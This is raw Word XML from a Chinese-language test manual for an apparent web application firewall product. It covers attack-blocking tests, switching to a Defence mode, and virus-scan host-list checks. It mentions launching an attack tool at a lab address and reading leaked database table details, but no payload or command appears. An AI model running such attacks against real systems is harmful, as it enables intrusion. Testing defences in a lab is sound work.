                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>出看到</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>了有数据库表有关的信息。（后</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>附启动</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击工具的相关步骤演示）。目标地址为：http://192.168.1.239/shoot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D627CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="002E88E4" wp14:editId="144648B4">
                  <wp:extent cx="4104005" cy="1837690"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="542" name="图片 5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
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId107"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1837690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC1D3F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2E2084C6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287742BF"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02486392" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="32395B3A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30926445"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7B1D685B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D6D96C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc29695"/>
      <w:bookmarkStart w:id="376" w:name="_Toc36487970"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>效果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
      <w:bookmarkEnd w:id="376"/>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06151CA3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503D96BF"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65CD0A68" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>拦截</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>效果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4939D983" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F85F6B"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3D7193A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6AB8477A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5A55C0"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63987473" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0FB5E554" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A9AFC25" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66C7F5B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="675FEBDE" wp14:editId="65E8A0FC">
                  <wp:extent cx="4104005" cy="2063750"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="19050"/>
                  <wp:docPr id="543" name="图片 543" descr="waf_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waf_alarm"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId108"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2063750"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2029C133" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>在WAF防火墙页面，可以看到攻击数据的统计结果以及防御日志的信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE58DF3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2874C0D6" wp14:editId="22168AB1">
                  <wp:extent cx="4104005" cy="2037080"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="20320"/>
                  <wp:docPr id="544" name="图片 544" descr="w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af"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId109"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2037080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D83ADF9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="77B55AFA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502B8003"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2FDACB48" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D59BCC2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03701027"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7D2847DC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46AB1F70" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc32392"/>
      <w:bookmarkStart w:id="378" w:name="_Toc36487971"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到Defence状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
      <w:bookmarkEnd w:id="378"/>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6B4F99DD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE1F809"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50F53DC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>切换到Defence状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5F7C04BF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67CE9151"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7AA9CF20" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>切换到Defence状态</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，查看攻击拦截情况。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C84698A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33CEF29F"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253E926F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70BF5E07" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED1BC55" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F32E39E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="55D35D93" wp14:editId="28B9AFDD">
                  <wp:extent cx="4104005" cy="2071370"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="11430"/>
                  <wp:docPr id="545" name="图片 545" descr="2017-09-25_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17-09-25_1823"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId110"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2071370"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E52FCF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击工具的结果显示Have WAF,Fail attack!!! </w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，查看waf界面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="73D21C4C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78872BA0"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74A18757"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>waf防火墙页面可以看到攻击数据的统计信息以及日志信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C3EF9AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E948E03"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0418F36B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26FD6FB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="379" w:name="_Toc36487972"/>
      <w:bookmarkStart w:id="380" w:name="_Toc36573248"/>
      <w:bookmarkStart w:id="381" w:name="_Toc36630334"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>系统检测</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w14:paraId="63B286DB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="_Toc36487973"/>
      <w:bookmarkStart w:id="383" w:name="_Toc36573249"/>
      <w:bookmarkStart w:id="384" w:name="_Toc36630335"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
      <w:bookmarkEnd w:id="383"/>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w14:paraId="52EC6A2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统检测页面，用户可以进行病毒扫描的相关操作，比如查看主机列表，新增、删除或搜索列表中的主机，病毒查杀等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B252C2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc36487974"/>
      <w:bookmarkStart w:id="386" w:name="_Toc36573250"/>
      <w:bookmarkStart w:id="387" w:name="_Toc36630336"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
      <w:bookmarkEnd w:id="386"/>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="1E1DB379" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="_Toc36487975"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>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36A02B8E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="747AD802"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27BDC7A1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4328707D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B3A5AD"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3BE7B570" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>验证页面中主机列表的显示是否正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4A8FD851" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01704D58"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4C53EBF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
